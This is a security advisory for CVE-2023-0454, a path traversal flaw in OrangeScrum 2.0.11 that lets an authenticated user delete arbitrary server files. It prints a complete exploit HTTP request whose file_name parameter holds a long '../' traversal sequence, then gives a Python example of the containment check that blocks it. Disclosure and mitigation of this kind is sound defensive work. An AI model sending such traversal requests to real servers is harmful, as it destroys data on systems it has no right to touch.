OrangeScrum 2.0.11 - Arbitrary File Delete via file_name
Summary
| Field | Value |
|---|---|
| Name | OrangeScrum 2.0.11 - Arbitrary File Delete via file_name |
| Code name | |
| Product | OrangeScrum |
| Affected versions | 2.0.11 |
| State | Public |
| Release date | 2023-01-30 |
Vulnerability
| Field | Value |
|---|---|
| Kind | Lack of data validation - Path Traversal |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
| CVSSv3.1 Base Score | 8.1 |
| Exploit available | No |
| CVE ID(s) | CVE-2023-0454 |
Description
OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
Vulnerability
This vulnerability occurs because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
Exploit
To exploit this vulnerability, we only need to send the following malicious request to the server. The value of the file_name parameter is used to build the path of the file that gets deleted, so a traversal sequence reaches files outside the intended directory.

```http
POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close

file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt
```
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0454 to refer to this issue from now on.
System Information
- Version: OrangeScrum 2.0.11
- Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
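Since no vendor patch exists, the following added example (not OrangeScrum's code) shows the containment check a file-delete handler needs to stop the path traversal described above: the user-supplied file_name is resolved under a fixed upload directory and rejected if the canonical path lands anywhere else. The directory names and file names are constructed for the demonstration.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a user-supplied file name would escape the upload directory."""


def resolve_upload_path(base_dir: str, file_name: str) -> str:
    """Resolve file_name inside base_dir and refuse anything that escapes it."""
    # Absolute paths and NUL bytes are never legitimate upload names.
    if not file_name or "\x00" in file_name or os.path.isabs(file_name):
        raise PathTraversalError(f"rejected file name: {file_name!r}")
    root = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks before the comparison,
    # so a name such as '../../../../var/www/html/...' resolves to its real target.
    candidate = os.path.realpath(os.path.join(root, file_name))
    # commonpath (rather than startswith) avoids accepting a sibling like 'uploads2'.
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversalError(f"path escapes upload directory: {file_name!r}")
    return candidate


def delete_upload(base_dir: str, file_name: str) -> bool:
    """Delete an upload only if it resolves inside base_dir. Returns True on success."""
    target = resolve_upload_path(base_dir, file_name)
    if not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo() -> dict:
    """Constructed scenario: a temporary webroot with one upload and one protected file."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "uploads")
        os.mkdir(uploads)
        open(os.path.join(uploads, "report.pdf"), "w").close()
        protected = os.path.join(tmp, "config.php")  # outside the upload directory
        open(protected, "w").close()
        results = {"legit": delete_upload(uploads, "report.pdf")}
        try:
            delete_upload(uploads, "../config.php")
            results["traversal"] = "deleted"  # must never happen
        except PathTraversalError:
            results["traversal"] = "blocked"
        results["protected_still_exists"] = os.path.exists(protected)
        return results


if __name__ == "__main__":
    print(demo())
```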
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/Orangescrum/orangescrum/
Timeline
- 2023-01-23: Vulnerability discovered.
- 2023-01-23: Vendor contacted.
- 2023-01-23: Vendor replied acknowledging the report.
- 2023-01-30: Public disclosure.